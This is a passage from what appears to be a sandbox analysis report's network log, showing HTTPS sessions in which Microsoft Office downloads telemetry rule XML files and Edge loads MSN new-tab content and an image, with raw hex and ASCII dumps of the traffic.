20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.6	49924	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:52 UTC	192	OUT	GET /rules/rule120672v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:52 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:52 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA740822" x-ms-request-id: fafd7d00-e01e-00aa-3a63-3bceda000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060952Z-178bfbc474bxkclvhC1NYC69g4000000043000000000258m x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:52 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.6	49927	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:52 UTC	192	OUT	GET /rules/rule120674v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:53 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:53 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA4037B0D" x-ms-request-id: ba159eff-a01e-000d-0e45-3cd1ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060953Z-178bfbc474bvjk8shC1NYC83ns00000003ug00000000fcec x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:53 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.6	49925	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:53 UTC	192	OUT	GET /rules/rule120673v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:53 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:53 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT ETag: "0x8DC582BB464F255" x-ms-request-id: 9a5c0c24-501e-0064-106e-3c1f54000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060953Z-174c587ffdf59vqchC1TEByk6800000002sg000000002egy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:53 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.6	49932	20.75.60.91	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:53 UTC	1017	OUT	GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=076D87ACE96D60880BB292ECE84461D8&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.150&clr=esdk&edgeid=5518710994624701133&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=ed7039153ef64b578c0b1982c04b9aec HTTP/1.1 Host: arc.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=076D87ACE96D60880BB292ECE84461D8; _EDGE_S=F=1&SID=362A82EB85AA6E9C174A97AB845F6F4F; _EDGE_V=1; _C_ETH=1; msnup=
2024-11-23 06:09:54 UTC	777	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 2704 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"DcoPlusDebug":"Status: Ok"},{"RADIDS":"1,P425132793-T700343875-C128000000002115269+B+P60+S1"},{"BATCH_REDIRECT_STORE":"B128000000002115269+P0+S0"},{"OPTOUTSTATE":"256"},{"REGIONALPOLICY":"0"}] Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Allow-Credentials: true X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sat, 23 Nov 2024 06:09:53 GMT Connection: close
2024-11-23 06:09:54 UTC	2704	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 4d 53 4e 41 6e 61 68 65 69 6d 4e 65 77 73 4e 54 50 49 6d 61 67 65 48 6f 74 73 70 6f 74 73 5c 22 2c 5c 22 75 5c 22 3a 5c 22 4d 53 4e 41 6e 61 68 65 69 6d 4e 65 77 73 4e 54 50 49 6d 61 67 65 73 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 74 69 74 6c 65 5c 22 3a 5c 22 4c 61 6b 65 20 54 72 61 73 69 6d 65 6e 6f 2c 20 49 74 61 6c 79 5c 22 2c 5c 22 63 74 61 5c 22 3a 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 5c 2f 73 65 61 72 63 68 3f 71 3d 4c 61 6b 65 2b 54 72 61 73 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"MSNAnaheimNewsNTPImageHotspots\",\"u\":\"MSNAnaheimNewsNTPImages\"}],\"ad\":{\"title\":\"Lake Trasimeno, Italy\",\"cta\":\"https:\/\/www.bing.com\/search?q=Lake+Tras

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.6	49933	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:54 UTC	192	OUT	GET /rules/rule120675v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:54 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:54 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6CF78C8" x-ms-request-id: a5f5ebba-f01e-003f-29f6-3cd19d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060954Z-178bfbc474btvfdfhC1NYCa2en0000000450000000007xnu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:54 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.6	49934	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:54 UTC	192	OUT	GET /rules/rule120676v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:54 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:54 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B984BF177" x-ms-request-id: 18e5e448-501e-000a-7b67-3b0180000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060954Z-178bfbc474b9xljthC1NYCtw9400000003z0000000008d1h x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:54 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.6	49936	104.117.182.56	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:54 UTC	634	OUT	GET /tenant/amp/entityid/BB1msG0W.img HTTP/1.1 Host: img-s-msn-com.akamaized.net Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-23 06:09:54 UTC	520	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Last-Modified: Sun, 10 Nov 2024 11:08:13 GMT X-Datacenter: northeu X-ActivityId: 01e23b13-0c41-4720-81b8-4b40bbbf8b50 Timing-Allow-Origin: * X-Frame-Options: deny X-ResizerVersion: 1.0 Content-Type: image/jpeg Content-Location: https://img.s-msn.com/tenant/amp/entityid/BB1msG0W X-Source-Length: 87332 Content-Length: 87332 Cache-Control: public, max-age=104350 Expires: Sun, 24 Nov 2024 11:09:04 GMT Date: Sat, 23 Nov 2024 06:09:54 GMT Connection: close
2024-11-23 06:09:54 UTC	15864	IN	Data Raw: ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 Data Ascii: XICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmdd
2024-11-23 06:09:55 UTC	16384	IN	Data Raw: 41 c5 0f 56 17 26 a2 a5 49 f1 2f 75 d9 17 5a 7b c7 aa 3a c4 4c 82 b8 92 a5 48 e2 3d d7 6b a8 de 28 ab 07 62 b8 d5 a7 52 5c 15 ee bb 55 29 52 e3 f5 0f 14 62 eb 92 e2 bf 76 1d 6a 93 a9 72 fa a5 3e a1 e2 97 13 f7 61 d4 a8 a2 a9 72 ba 87 8a 9d 44 71 57 bb 0e ad 65 4a ca e6 9b b2 87 a8 ee 25 2e 27 ee c3 a7 59 52 b2 b9 a2 e1 08 fa a1 1c 4f dc f9 6e ea 14 eb 58 3a 81 17 50 71 4f 8f c0 e7 f2 db 5a 95 ac 95 8e 2a 56 12 af 85 73 f9 6b ea 15 2b 59 6a 09 56 38 84 ab e0 f9 fc b5 d6 a5 6b 25 61 4a c2 28 b9 b5 56 53 ac ac b5 21 ad 14 7c 9b 2b 4e b5 ce 2f 29 03 e3 f9 a7 47 19 4e 8e 85 68 ab 5c 8a cc c3 79 bf 25 a4 38 01 99 2e ee 36 01 44 ce 30 d6 23 29 dd be b5 2b 58 58 5c f7 86 34 4c e4 9d c3 47 13 dd 6b b8 d6 31 c1 a1 ff 00 1c 19 f4 f1 ec 95 e3 74 38 e5 31 6b 6b 2a 56 Data Ascii: AV&I/uZ{:LH=k(bR\U)Rbvjr>arDqWeJ%.'YROnX:PqOZVsk+YjV8k%aJ(VS!\|+N/)GNh\y%8.6D0#)+XX\4LGk1t81kkV
2024-11-23 06:09:55 UTC	2148	IN	Data Raw: 39 c2 ef fb 4d cf f9 2d 81 8a 84 66 70 bd 25 fd 1d ab cd a5 cc 6c 0d bc 3d 16 4b 5a 0b 3a 56 b8 db 6c 38 b4 89 24 9f c0 4b 1c 67 1c ac 65 31 38 d7 77 84 be f7 39 ef 24 48 2e 3e 00 99 31 3f 88 2b d3 db bc 47 b5 3b 06 a0 d7 33 e7 e0 38 1c af 23 79 ee 1c b3 3c 62 63 1b 0e 18 f0 5e a3 db d8 db ba 40 c7 49 04 b8 9c f8 f6 e0 a3 0d f2 cb d2 4f 39 e3 11 eb 0d 3a 36 58 d6 e9 ad b2 ec 12 c9 03 39 86 91 f5 d8 80 bb 54 da d0 e9 9f d3 11 4b 4d 24 e7 3d b7 5e 12 d5 df db 5f 75 c6 e0 36 b0 07 ac c4 ef fe 61 76 4e a8 bf db 8c 46 5e fb 64 e4 6f cd 38 3e 3f a8 c2 b8 ca 3e f5 fd 8a 62 63 d3 ff 00 ae 46 b3 55 d7 be cb 8e 30 43 18 4e 24 d4 d0 0e 27 10 4e 76 5b fd d2 ff 00 56 e3 4f 60 cd b8 12 b9 4d a4 1b 75 09 d8 c7 01 dc ed 2b 67 b8 b6 9b bc a3 96 91 49 de 64 7e 6b 3e d9 7a Data Ascii: 9M-fp%l=KZ:Vl8$Kge18w9$H.>1?+G;38#y<bc^@IO9:6X9TKM$=^_u6avNF^do8>?>bcFU0CN$'Nv[VO`Mu+gId~k>z
2024-11-23 06:09:55 UTC	16384	IN	Data Raw: 1f b2 24 f0 2a dd 6d e0 2e 1a 4c 40 21 b8 39 ef be c0 6d f1 5c 6a 83 83 6e 03 2e 73 5c d2 3b f2 9e 3e 32 b4 99 de 58 46 d1 0b 5d ff 00 1d 98 11 51 9e dd 8c ce c0 67 30 b5 1b c5 c2 f5 3f e9 df f4 ff 00 29 b6 d3 af e9 2a 18 e8 8c 18 f3 11 b8 e2 21 b2 73 dd 72 b4 d2 2e 3a 60 d2 46 d9 1b 1f 1c e4 a8 95 ee b2 e5 83 43 03 89 a9 f3 50 c7 2c 1c 1f 86 e8 5f 36 ed 3c 02 69 a8 36 a8 8a a3 c2 61 7a 06 59 ea 33 4f a8 73 83 9b 75 ef b5 4f ea a9 ac 9a a3 86 21 4b de d4 cb 9e 47 b9 b2 66 3b 27 8c 72 8b 84 e5 3c 72 df 6d 9c 3d 13 4d b7 17 38 37 23 0e 74 f1 dd b1 df 82 bb 45 6e d3 c5 cb af 7b 8b ad bc 40 dc 3a 78 cb 7c 17 47 51 a2 a7 a6 03 e9 37 6a 6b 49 ed 03 3c 37 d8 2e 5b ad f4 00 b6 d3 2e 1c a6 27 ed 6e 7f f2 84 ea 8a 26 e1 ba f5 e0 c6 d9 0d 93 51 ef 1d 8c 0f af 74 44 Data Ascii: $m.L@!9m\jn.s\;>2XF]Qg0?)!sr.:`FCP,_6<i6azY3OsuO!KGf;'r<rm=M87#tEn{@:x\|GQ7jkI<7.[.'n&QtD
2024-11-23 06:09:55 UTC	16384	IN	Data Raw: 3b 2e fe 86 ed ce 8d c8 0e 77 38 0c 02 24 e7 23 80 9c 99 ff 00 75 ca f7 29 6d cb 6d 68 14 35 81 8d 70 02 93 de 4c 72 b4 c7 36 fb 39 6b d1 8b 6e 6d 0f 73 1b 6d a0 f3 09 82 48 34 80 c0 e0 4f 78 26 4c 9e e5 65 0b de 26 9d 8d 7d a0 6c 31 96 5a 45 34 e0 39 c0 07 3a 72 39 aa 2c 02 65 d1 bc 60 2f 1a 19 7e dd ca 6f 36 e3 0b a6 6a 04 4e 47 36 60 76 f5 ca f6 8f 7b ae 59 b7 55 de 88 73 88 bb 73 7b b3 6c 0a 5e 36 2d 2e 9c 6c 18 d0 27 65 eb f4 cf 66 a3 4f 6d e2 08 73 7b 89 f8 ef 9e 3e 28 c5 5e 48 ba f4 7c ea f5 d1 72 cd b7 44 3d ef 2c 74 6f 92 03 72 37 c3 49 1c 30 51 1b 8d 75 e8 cd 21 85 c0 d4 49 34 b7 cd 9c 97 76 f4 ec bd f3 f4 5a 67 64 d9 b7 bc e1 b0 67 c0 88 3e bc 57 39 de d5 a4 79 91 6e 98 69 6e 0c 82 3c 43 a7 3f 82 b5 a6 37 4f 14 da 5f a8 37 40 69 65 ba 00 a8 45 Data Ascii: ;.w8$#u)mmh5pLr69knmsmH4Ox&Le&}l1ZE49:r9,e`/~o6jNG6`v{YUss{l^6-.l'efOms{>(^H\|rD=,tor7I0Qu!I4vZgdg>W9ynin<C?7O_7@ieE
2024-11-23 06:09:55 UTC	7952	IN	Data Raw: 95 cf e4 96 de 3d 1c d9 75 55 b4 c3 9a 49 2e 18 87 4e e2 3b cf 05 f6 0d 33 c3 ec db 21 fd 4e 51 cd dc 98 cc f8 ce fe 2b e7 ac f6 d1 76 d3 1c 0b aa 70 f2 48 a8 ba 4e 4f 80 11 27 c2 22 4a f7 b6 22 de 9e dd 51 53 58 d0 ea 66 24 0f e9 13 f2 53 e2 89 8b 69 e4 ec af 5c 5c 19 38 a7 b8 ce 79 86 30 72 08 3e ab 76 94 f5 2d b2 93 5e 37 12 47 d0 90 0c 2f 2d a9 ba db 97 0d 73 20 4c 36 79 43 79 b6 25 a4 ed 24 9e 11 0b d2 7b 65 db 7f b7 86 39 a4 c9 26 05 3b 9d c8 18 f0 31 85 a5 ef 29 ec e9 f4 8f 72 02 ca d7 55 71 cc e1 b1 91 07 d2 37 57 dc b9 0d 26 7f 3f bb 2b cd 36 f3 6d 5c ad ef aa 24 12 1b b9 e0 48 18 a4 76 8d b2 ae 66 4b 66 8d 75 ea 00 87 5b 20 f7 90 69 20 ee 44 83 4f 63 07 13 95 e3 03 eb 78 6b 1c 61 d7 5b 54 62 09 fb 2e 35 13 89 cb bb f6 5d 2f 74 bd 6e e3 83 ec dc Data Ascii: =uUI.N;3!NQ+vpHNO'"J"QSXf$Si\\8y0r>v-^7G/-s L6yCy%${e9&;1)rUq7W&?+6m\$HvfKfu[ i DOcxka[Tb.5]/tn
2024-11-23 06:09:55 UTC	12216	IN	Data Raw: 98 95 e8 68 b6 eb b6 de 2b 74 10 5e e7 00 03 bc b0 e8 9e 59 c9 6f 7d c0 88 46 6d ea 03 dd c8 74 f6 f9 9d 2c a6 e8 26 70 5b 37 04 97 76 c9 f4 90 8c a5 b6 38 e8 3d 3d d1 72 28 b9 43 5a d2 1f a9 0d a5 c1 c5 b8 04 92 e6 b8 c4 72 01 1b 49 19 5e 67 5b 41 a1 8f be 5f 71 84 08 b9 6a 1c 1b 93 cd 93 81 f6 24 0c ae b4 30 69 e3 24 32 e0 7b b2 de a5 cd e1 c4 09 2c a4 6c 24 f7 55 bf db 5b 75 b7 1f 6e cb 9e 5b fd db 85 d7 5a 4b 83 8c 82 20 12 d0 40 74 83 df ba c3 bb a7 2f e2 3d 2f 51 cc 73 2d d4 e9 0e e9 9e 9b 58 eb ac fd 61 ae 24 16 b0 4e 33 e8 b1 35 b4 5e 0d 73 5b 70 b3 fb 6e 68 27 98 87 10 1d 38 18 04 01 9d b7 28 4d cf ec b6 5c 6d 93 04 96 90 5d b8 14 37 1d bb 97 13 b2 b9 97 1c 2e 65 a7 9c 5c 20 4c 07 54 25 a0 87 02 25 b8 a8 08 90 42 d9 cd 72 ae fd c3 0f b8 5d 50 27 Data Ascii: h+t^Yo}Fmt,&p[7v8==r(CZrI^g[A_qj$0i$2{,l$U[un[ZK @t/=/Qs-Xa$N35^s[pnh'8(M\m]7.e\ LT%%Br]P'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.6	49937	104.117.182.56	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
